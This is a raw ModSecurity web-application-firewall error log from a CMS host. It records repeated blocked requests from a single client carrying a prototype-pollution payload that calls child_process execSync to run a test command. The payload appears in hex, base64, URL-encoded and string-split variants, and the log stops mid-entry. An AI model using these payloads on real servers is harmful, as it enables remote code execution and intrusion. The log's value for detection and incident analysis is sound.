$((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1pc83uMXRUE9zvQTjwAAAco"] [Sun Apr 05 15:42:46.182769 2026] [:error] [pid 1503:tid 1505] [client 172.94.9.253:47254] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1kI7AjfUQYCN-J7D7wAAAMA"] [Sun Apr 05 15:42:46.183048 2026] [:error] [pid 13019:tid 13259] [client 172.94.9.253:47290] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1rxQSOrq_iRTM7dq0QAAARM"] [Sun Apr 05 15:42:46.183402 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:47304] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1rxQSOrq_iRTM7dq0gAAARI"] [Sun Apr 05 15:42:46.183621 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:47258] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1pc83uMXRUE9zvQTkAAAAcU"] [Sun Apr 05 15:42:46.184980 2026] [:error] [pid 1503:tid 1532] [client 172.94.9.253:47336] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1kI7AjfUQYCN-J7D8AAAANQ"] [Sun Apr 05 15:42:46.194356 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:47262] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1pc83uMXRUE9zvQTkQAAAcM"] [Sun Apr 05 15:42:46.194440 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:47316] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1pc83uMXRUE9zvQTkgAAAdM"] [Sun Apr 05 15:42:46.290497 2026] [:error] [pid 1503:tid 1522] [client 172.94.9.253:37800] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1kI7AjfUQYCN-J7D8wAAAM0"] [Sun Apr 05 15:42:46.291312 2026] [:error] [pid 13019:tid 13255] [client 172.94.9.253:37858] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1rxQSOrq_iRTM7dq1gAAAQ8"] [Sun Apr 05 15:42:46.291847 2026] [:error] [pid 23077:tid 23104] [client 172.94.9.253:37834] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1pc83uMXRUE9zvQTlAAAAdU"] [Sun Apr 05 15:42:46.292304 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:37818] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1rxQSOrq_iRTM7dq1wAAAQ4"] [Sun Apr 05 15:42:46.292496 2026] [:error] [pid 1309:tid 1379] [client 172.94.9.253:37870] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1j-XKUNJEHmNu6G7zwAAAIg"] [Sun Apr 05 15:42:46.294191 2026] [:error] [pid 1503:tid 1521] [client 172.94.9.253:37822] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1kI7AjfUQYCN-J7D9AAAAMw"] [Sun Apr 05 15:42:46.301717 2026] [:error] [pid 23077:tid 23083] [client 172.94.9.253:37880] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1pc83uMXRUE9zvQTlgAAAcA"] [Sun Apr 05 15:42:46.301976 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:37824] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1pc83uMXRUE9zvQTlQAAAcY"] [Sun Apr 05 15:42:46.304146 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:37804] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1rxQSOrq_iRTM7dq2AAAARA"] [Sun Apr 05 15:42:46.317901 2026] [:error] [pid 1503:tid 1533] [client 172.94.9.253:37846] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1kI7AjfUQYCN-J7D9QAAANU"] [Sun Apr 05 15:42:46.412508 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:37970] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1pc83uMXRUE9zvQTmAAAAco"] [Sun Apr 05 15:42:46.413685 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:37898] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1rxQSOrq_iRTM7dq2QAAARg"] [Sun Apr 05 15:42:46.414200 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:37976] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 